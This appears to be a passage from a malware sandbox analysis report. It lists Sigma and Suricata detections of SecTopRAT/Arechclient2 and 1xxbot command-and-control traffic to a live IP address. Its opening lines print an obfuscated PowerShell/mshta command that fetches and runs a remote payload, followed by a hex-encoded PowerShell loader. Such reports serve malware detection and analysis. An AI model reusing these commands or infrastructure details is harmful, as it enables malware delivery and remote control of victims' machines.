h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp, ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 7936, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']'), ProcessId: 7952, ProcessName: powershell.exe

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wrdZ($UvhG){return -split ($UvhG -replace '..', '0x$& ')};$ERHgk = wrdZ('ECA586FB867E54D080F88AB849BFB94F298E9D4D174F6B1F2F81610C3540C56191E34FB7B2DF87630478E180DACA97337CF338C5F0549579E18CC1A49A1339F9691FAE2EDAAC0D6E2AB4913030D45E7F9C40731A7B0ED45F438D15D573AB5E4816A3D8CA82DAA342D630EDB6E24E85F4D05E0447A728444A18214CD35DB1FD5C4C677BF1EB6DD62A0D4B42A5F996D056A8C58BF2B2ADC007CA0004F35EEDF7DB06CC47C0E8175257375360952646DDCE12F86A389A2FB4F08F04DF71ABBD10CA19394807E45AE262B4CF2BD880666BE9808038992E086339CA69F730462BD5BA268BEA9591B45C3FDDC4B990452C3C5B083B1D8A99DB9D344BE7F259679F7994FBAA4E272654402905FEB107236FDE83FA247F6DFF5EE2DE2FBE984DE8D33A5077EC31D65DAE7AAC344DB18BADD0E59C3DC0A20AA1776387E75ED82F6F21E81D436D435FE7641490C8BB3BE615F9D76B1F8A1323001EC29CB1DC720A20647927291ABFCCFF409B1F94A878B0CDB0AFF68E11DAF8B2CCB95D3B395C11FB1D2F79673936E5F6AF545B019BFDE71CDAC1667709524F9244C6D8B3198F1F28C92F507AF233B70FD15099184E521AA3D1F4EB4613BE4CC9617FD5EE373CB05A7B164A2B6211387C494F7FC2F64FB4B0EEC11B39FFCC4E09EE10E96070192D4E0E2AD737B857A3BA8766EF8B454E4CC9BAE60331184407821C7F5A417DEBB95885CD929FAC64B5913D45E20BA92710C789EA36BC01ED629BAAEEFB8F420E9D966E4669DB7E1EE213C1001073B4FB67BB454BA80B0144D096E4FA221E9AB74FB2FDA2CBBA9C669EB50610B810047A6A75A1E41407350666C1B141836EA4FB3C9588111CE216EB2E451248C7008EA09561E08463428A981B69214151A19DD58483CB4A07DA879953AA3FDBF8EC16A79ACD16FBF54B34E405FCE7D15727908982C71DB4EC3160579745FCBC610756535558573F49618C7606881E9C8F026001D9C1C40FD2462CC1EC3DCF620D160F23D6F789F8CAA4EE9835FD65AA1D0E0278809DE0D85C1295E58C782AAFF7016B75C2FBB65FE1F73E7B038C89BAA57C32930D22EE8C71A06F4A2C738995833A10226ECDFB07ECD5F6DA31617797E009FA791AB33D9189A3A8E44428EFC9D7C6FAC3474FD38038FE910BBB036CFF902B287315F807FAAA06AED95210DDE82DAEAC0A523D871AE53C0EF75EF61B9A57F8F33A81ABD5D297C8FA835397595E7202A8E9007FFC7EDE814D001B798D89293879C641BE0707A91665E5503FECF99138AC09675DB1C070F4CF90193587A5FFC1CEE76401544370EB81704BA787C0CD04C9585C45A98FE309B624E2A8DF58992BFB2E28E05D3E083F40D7259170B815F21C934D9A6B716FB374544D200AC2F51F83FF6015BF31FAF855ACD6F94C4EDCFFE1B1B1E84CD0DCE3476BE438811875890C244AF355F5A99D60D3FE596651A7FCE949EF11B75A3E47270440D77D7293E40B99F248B7EA50AE844851B9FCECC2A42A543848822154E0BDE72E753A37ABBC37D5A523E44824FDECB7EA3DA94AE0BC489AFB57E7FF8B9D330E6B6CF749C38703F35FBB8C7524C1CC772CB6E97F52B9A303F765EEA1CF88781CF03DBAF4E05C5E83D04900C62AE76C9060D2EF02C6358A9C35D3C5CADDA4513FE8720161EE8D258C9D8738089620A44FDD02266B9393340D2A4D6DF53670CE0EAC8ADF596CBD6821F99D9AA7D32C9C1C8CDD6A112CF9684123E95FA54979737993CA2ED54A8E4E7B526955F3B82D4D1180DCF858A68E630366BAE559198412C920E3DF514DC1275386D42B0CF7D7800F9A9C56DF30AC55BB715221A65AC5F1B6C047475AF5D327C3E5F8421DC5507C9898E1CA30BC70D6ED81C7FBE88DC6473A1B361F63E277C1B83D0BA47D9D3A44BB1ED147D9E3D1391B4E0C9728E31F4600C8F8CDC7EA1BB362F215217B57B713C7F2C9B60FFBB1ABFF32654C427DAA0BD39D0753919D0F4F7B47FF923BD6

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7520, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:38:50.278219+0100	2029217	1	Malware Command and Control Activity Detected	92.255.57.75	15647	192.168.2.11	49796	TCP
2024-12-17T08:39:59.233698+0100	2029217	1	Malware Command and Control Activity Detected	92.255.57.75	15647	192.168.2.11	49995	TCP
2024-12-17T08:40:11.200138+0100	2029217	1	Malware Command and Control Activity Detected	92.255.57.75	15647	192.168.2.11	50034	TCP
2024-12-17T08:41:26.751766+0100	2029217	1	Malware Command and Control Activity Detected	92.255.57.75	15647	192.168.2.11	50095	TCP
2024-12-17T08:41:43.871385+0100	2029217	1	Malware Command and Control Activity Detected	92.255.57.75	15647	192.168.2.11	50107	TCP
2024-12-17T08:41:45.380713+0100	2029217	1	Malware Command and Control Activity Detected	92.255.57.75	15647	192.168.2.11	50109	TCP
2024-12-17T08:41:58.287437+0100	2029217	1	Malware Command and Control Activity Detected	92.255.57.75	15647	192.168.2.11	50118	TCP
2024-12-17T08:42:09.843412+0100	2029217	1	Malware Command and Control Activity Detected	92.255.57.75	15647	192.168.2.11	50126	TCP
2024-12-17T08:42:15.342844+0100	2029217	1	Malware Command and Control Activity Detected	92.255.57.75	15647	192.168.2.11	50131	TCP

ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:38:49.123574+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:49.243456+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:49.363630+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:49.483530+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:49.603426+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:49.723432+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:49.843498+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:49.963790+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:50.083641+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:50.203643+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:50.278354+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:50.398172+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:50.518134+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:50.639201+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:50.758990+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:39:58.032343+0100	2051910	1	A Network Trojan was detected	192.168.2.11	49995	92.255.57.75	15647	TCP
2024-12-17T08:40:09.988167+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50034	92.255.57.75	15647	TCP
2024-12-17T08:41:25.564492+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50095	92.255.57.75	15647	TCP
2024-12-17T08:41:42.667709+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50107	92.255.57.75	15647	TCP
2024-12-17T08:41:42.984016+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50107	92.255.57.75	15647	TCP
2024-12-17T08:41:43.104759+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50107	92.255.57.75	15647	TCP
2024-12-17T08:41:44.140194+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50109	92.255.57.75	15647	TCP
2024-12-17T08:41:45.021396+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50109	92.255.57.75	15647	TCP
2024-12-17T08:41:45.137600+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50109	92.255.57.75	15647	TCP
2024-12-17T08:41:45.379965+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50109	92.255.57.75	15647	TCP
2024-12-17T08:41:57.060510+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50118	92.255.57.75	15647	TCP
2024-12-17T08:41:58.266298+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50118	92.255.57.75	15647	TCP
2024-12-17T08:42:08.640978+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50126	92.255.57.75	15647	TCP
2024-12-17T08:42:09.053917+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50126	92.255.57.75	15647	TCP
2024-12-17T08:42:09.089848+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50126	92.255.57.75	15647	TCP
2024-12-17T08:42:09.796876+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50126	92.255.57.75	15647	TCP
2024-12-17T08:42:14.140224+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50131	92.255.57.75	15647	TCP
2024-12-17T08:42:14.624410+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50131	92.255.57.75	15647	TCP
2024-12-17T08:42:15.272040+0100	2051910	1	A Network Trojan was detected	192.168.2.11	50131	92.255.57.75	15647	TCP

ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:38:55.163211+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49808	92.255.57.75	9000	TCP
2024-12-17T08:38:56.713786+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49814	92.255.57.75	9000	TCP
2024-12-17T08:38:58.281773+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49819	92.255.57.75	9000	TCP
2024-12-17T08:38:59.913324+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49821	92.255.57.75	9000	TCP
2024-12-17T08:39:01.478526+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49827	92.255.57.75	9000	TCP
2024-12-17T08:39:03.050769+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49832	92.255.57.75	9000	TCP
2024-12-17T08:39:04.616357+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49838	92.255.57.75	9000	TCP
2024-12-17T08:39:06.196377+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49840	92.255.57.75	9000	TCP
2024-12-17T08:39:07.763614+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49846	92.255.57.75	9000	TCP
2024-12-17T08:39:09.343309+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49851	92.255.57.75	9000	TCP
2024-12-17T08:39:10.900365+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49853	92.255.57.75	9000	TCP
2024-12-17T08:39:12.445801+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49859	92.255.57.75	9000	TCP
2024-12-17T08:39:13.998214+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49864	92.255.57.75	9000	TCP
2024-12-17T08:39:15.559621+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49866	92.255.57.75	9000	TCP
2024-12-17T08:39:17.497250+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49872	92.255.57.75	9000	TCP
2024-12-17T08:39:19.064007+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49879	92.255.57.75	9000	TCP
2024-12-17T08:39:20.620349+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49880	92.255.57.75	9000	TCP
2024-12-17T08:39:22.182572+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49886	92.255.57.75	9000	TCP
2024-12-17T08:39:23.745974+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49892	92.255.57.75	9000	TCP
2024-12-17T08:39:25.308426+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49898	92.255.57.75	9000	TCP
2024-12-17T08:39:26.870284+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49899	92.255.57.75	9000	TCP
2024-12-17T08:39:28.586573+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49905	92.255.57.75	9000	TCP
2024-12-17T08:39:30.149636+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49911	92.255.57.75	9000	TCP
2024-12-17T08:39:31.696759+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49917	92.255.57.75	9000	TCP
2024-12-17T08:39:33.323133+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49918	92.255.57.75	9000	TCP
2024-12-17T08:39:34.883749+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49924	92.255.57.75	9000	TCP
2024-12-17T08:39:36.444153+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49930	92.255.57.75	9000	TCP
2024-12-17T08:39:38.001727+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49931	92.255.57.75	9000	TCP
2024-12-17T08:39:39.587952+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49937	92.255.57.75	9000	TCP
2024-12-17T08:39:41.137150+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49943	92.255.57.75	9000	TCP
2024-12-17T08:39:42.702171+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49949	92.255.57.75	9000	TCP
2024-12-17T08:39:44.262768+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49950	92.255.57.75	9000	TCP
2024-12-17T08:39:45.820751+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49956	92.255.57.75	9000	TCP
2024-12-17T08:39:47.372943+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49962	92.255.57.75	9000	TCP
2024-12-17T08:39:48.933542+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49964	92.255.57.75	9000	TCP
2024-12-17T08:39:50.496459+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49969	92.255.57.75	9000	TCP
2024-12-17T08:39:52.057375+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49975	92.255.57.75	9000	TCP
2024-12-17T08:39:53.620267+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49981	92.255.57.75	9000	TCP
2024-12-17T08:39:55.184361+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49982	92.255.57.75	9000	TCP
2024-12-17T08:39:56.746834+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49988	92.255.57.75	9000	TCP
2024-12-17T08:39:58.385009+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49994	92.255.57.75	9000	TCP
2024-12-17T08:39:59.950905+0100	2052248	1	A Network Trojan was detected	192.168.2.11	49997	92.255.57.75	9000	TCP
2024-12-17T08:40:01.513011+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50002	92.255.57.75	9000	TCP
2024-12-17T08:40:03.075227+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50008	92.255.57.75	9000	TCP
2024-12-17T08:40:04.635475+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50014	92.255.57.75	9000	TCP
2024-12-17T08:40:06.203953+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50016	92.255.57.75	9000	TCP
2024-12-17T08:40:07.766361+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50021	92.255.57.75	9000	TCP
2024-12-17T08:40:09.327298+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50027	92.255.57.75	9000	TCP
2024-12-17T08:40:10.887777+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50029	92.255.57.75	9000	TCP
2024-12-17T08:40:12.447907+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50035	92.255.57.75	9000	TCP
2024-12-17T08:40:14.016690+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50041	92.255.57.75	9000	TCP
2024-12-17T08:40:15.573240+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50047	92.255.57.75	9000	TCP
2024-12-17T08:40:17.140306+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50048	92.255.57.75	9000	TCP
2024-12-17T08:40:18.700637+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50049	92.255.57.75	9000	TCP
2024-12-17T08:40:20.261661+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50050	92.255.57.75	9000	TCP
2024-12-17T08:40:21.824581+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50051	92.255.57.75	9000	TCP
2024-12-17T08:40:23.394151+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50052	92.255.57.75	9000	TCP
2024-12-17T08:40:24.956353+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50053	92.255.57.75	9000	TCP
2024-12-17T08:40:26.509896+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50054	92.255.57.75	9000	TCP
2024-12-17T08:40:28.063631+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50055	92.255.57.75	9000	TCP
2024-12-17T08:40:29.622720+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50056	92.255.57.75	9000	TCP
2024-12-17T08:40:31.209899+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50057	92.255.57.75	9000	TCP
2024-12-17T08:40:32.788179+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50058	92.255.57.75	9000	TCP
2024-12-17T08:40:34.356389+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50059	92.255.57.75	9000	TCP
2024-12-17T08:40:35.953959+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50060	92.255.57.75	9000	TCP
2024-12-17T08:40:37.511141+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50061	92.255.57.75	9000	TCP
2024-12-17T08:40:39.071988+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50063	92.255.57.75	9000	TCP
2024-12-17T08:40:40.626669+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50065	92.255.57.75	9000	TCP
2024-12-17T08:40:42.180961+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50066	92.255.57.75	9000	TCP
2024-12-17T08:40:43.729983+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50067	92.255.57.75	9000	TCP
2024-12-17T08:40:45.294166+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50068	92.255.57.75	9000	TCP
2024-12-17T08:40:46.855979+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50069	92.255.57.75	9000	TCP
2024-12-17T08:40:48.416564+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50070	92.255.57.75	9000	TCP
2024-12-17T08:40:49.995213+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50071	92.255.57.75	9000	TCP
2024-12-17T08:40:51.560552+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50072	92.255.57.75	9000	TCP
2024-12-17T08:40:53.129769+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50073	92.255.57.75	9000	TCP
2024-12-17T08:40:54.686702+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50074	92.255.57.75	9000	TCP
2024-12-17T08:40:56.242629+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50075	92.255.57.75	9000	TCP
2024-12-17T08:40:57.876736+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50076	92.255.57.75	9000	TCP
2024-12-17T08:40:59.431179+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50077	92.255.57.75	9000	TCP
2024-12-17T08:41:01.008999+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50078	92.255.57.75	9000	TCP
2024-12-17T08:41:02.588341+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50079	92.255.57.75	9000	TCP
2024-12-17T08:41:04.369272+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50080	92.255.57.75	9000	TCP
2024-12-17T08:41:05.928916+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50081	92.255.57.75	9000	TCP
2024-12-17T08:41:07.478669+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50082	92.255.57.75	9000	TCP
2024-12-17T08:41:09.030420+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50083	92.255.57.75	9000	TCP
2024-12-17T08:41:10.591098+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50084	92.255.57.75	9000	TCP
2024-12-17T08:41:12.148606+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50085	92.255.57.75	9000	TCP
2024-12-17T08:41:13.698083+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50086	92.255.57.75	9000	TCP
2024-12-17T08:41:15.266836+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50087	92.255.57.75	9000	TCP
2024-12-17T08:41:16.827334+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50088	92.255.57.75	9000	TCP
2024-12-17T08:41:18.422781+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50089	92.255.57.75	9000	TCP
2024-12-17T08:41:19.978640+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50090	92.255.57.75	9000	TCP
2024-12-17T08:41:21.555765+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50091	92.255.57.75	9000	TCP
2024-12-17T08:41:23.200006+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50092	92.255.57.75	9000	TCP
2024-12-17T08:41:24.759180+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50093	92.255.57.75	9000	TCP
2024-12-17T08:41:26.311298+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50094	92.255.57.75	9000	TCP
2024-12-17T08:41:27.873593+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50096	92.255.57.75	9000	TCP
2024-12-17T08:41:29.431685+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50097	92.255.57.75	9000	TCP
2024-12-17T08:41:30.998176+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50098	92.255.57.75	9000	TCP
2024-12-17T08:41:32.560204+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50099	92.255.57.75	9000	TCP
2024-12-17T08:41:34.128273+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50100	92.255.57.75	9000	TCP
2024-12-17T08:41:35.695801+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50101	92.255.57.75	9000	TCP
2024-12-17T08:41:37.312462+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50102	92.255.57.75	9000	TCP
2024-12-17T08:41:38.874060+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50103	92.255.57.75	9000	TCP
2024-12-17T08:41:40.436730+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50104	92.255.57.75	9000	TCP
2024-12-17T08:41:42.010830+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50105	92.255.57.75	9000	TCP
2024-12-17T08:41:43.574508+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50106	92.255.57.75	9000	TCP
2024-12-17T08:41:45.134788+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50108	92.255.57.75	9000	TCP
2024-12-17T08:41:46.742376+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50110	92.255.57.75	9000	TCP
2024-12-17T08:41:48.291590+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50111	92.255.57.75	9000	TCP
2024-12-17T08:41:49.859405+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50112	92.255.57.75	9000	TCP
2024-12-17T08:41:51.418630+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50113	92.255.57.75	9000	TCP
2024-12-17T08:41:52.980262+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50114	92.255.57.75	9000	TCP
2024-12-17T08:41:54.587030+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50115	92.255.57.75	9000	TCP
2024-12-17T08:41:56.247736+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50116	92.255.57.75	9000	TCP
2024-12-17T08:41:57.820857+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50117	92.255.57.75	9000	TCP
2024-12-17T08:41:59.373645+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50119	92.255.57.75	9000	TCP
2024-12-17T08:42:00.936757+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50120	92.255.57.75	9000	TCP
2024-12-17T08:42:02.626168+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50121	92.255.57.75	9000	TCP
2024-12-17T08:42:04.197750+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50122	92.255.57.75	9000	TCP
2024-12-17T08:42:05.762277+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50123	92.255.57.75	9000	TCP
2024-12-17T08:42:07.342589+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50124	92.255.57.75	9000	TCP
2024-12-17T08:42:08.903624+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50125	92.255.57.75	9000	TCP
2024-12-17T08:42:10.466558+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50127	92.255.57.75	9000	TCP
2024-12-17T08:42:12.025774+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50128	92.255.57.75	9000	TCP
2024-12-17T08:42:13.592122+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50129	92.255.57.75	9000	TCP
2024-12-17T08:42:15.154112+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50130	92.255.57.75	9000	TCP
2024-12-17T08:42:16.722434+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50132	92.255.57.75	9000	TCP
2024-12-17T08:42:18.277830+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50133	92.255.57.75	9000	TCP
2024-12-17T08:42:19.840543+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50134	92.255.57.75	9000	TCP
2024-12-17T08:42:21.404382+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50135	92.255.57.75	9000	TCP
2024-12-17T08:42:23.000105+0100	2052248	1	A Network Trojan was detected	192.168.2.11	50136	92.255.57.75	9000	TCP

ET MALWARE Win32/1xxbot CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:40:37.769348+0100	2028984	1	Malware Command and Control Activity Detected	192.168.2.11	50062	92.255.57.75	228	TCP
2024-12-17T08:40:39.171752+0100	2028984	1	Malware Command and Control Activity Detected	192.168.2.11	50064	92.255.57.75	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:38:56.713786+0100	2803305	3	Unknown Traffic	192.168.2.11	49814	92.255.57.75	9000	TCP
2024-12-17T08:38:58.281773+0100	2803305	3	Unknown Traffic	192.168.2.11	49819	92.255.57.75	9000	TCP
2024-12-17T08:38:59.913324+0100	2803305	3	Unknown Traffic	192.168.2.11	49821	92.255.57.75	9000	TCP
2024-12-17T08:39:01.478526+0100	2803305	3	Unknown Traffic	192.168.2.11	49827	92.255.57.75	9000	TCP
2024-12-17T08:39:03.050769+0100	2803305	3	Unknown Traffic	192.168.2.11	49832	92.255.57.75	9000	TCP
2024-12-17T08:39:04.616357+0100	2803305	3	Unknown Traffic	192.168.2.11	49838	92.255.57.75	9000	TCP
2024-12-17T08:39:06.196377+0100	2803305	3	Unknown Traffic	192.168.2.11	49840	92.255.57.75	9000	TCP
2024-12-17T08:39:07.763614+0100	2803305	3	Unknown Traffic	192.168.2.11	49846	92.255.57.75	9000	TCP
2024-12-17T08:39:09.343309+0100	2803305	3	Unknown Traffic	192.168.2.11	49851	92.255.57.75	9000	TCP
2024-12-17T08:39:10.900365+0100	2803305	3	Unknown Traffic	192.168.2.11	49853	92.255.57.75	9000	TCP
2024-12-17T08:39:12.445801+0100	2803305	3	Unknown Traffic	192.168.2.11	49859	92.255.57.75	9000	TCP
2024-12-17T08:39:13.998214+0100	2803305	3	Unknown Traffic	192.168.2.11	49864	92.255.57.75	9000	TCP
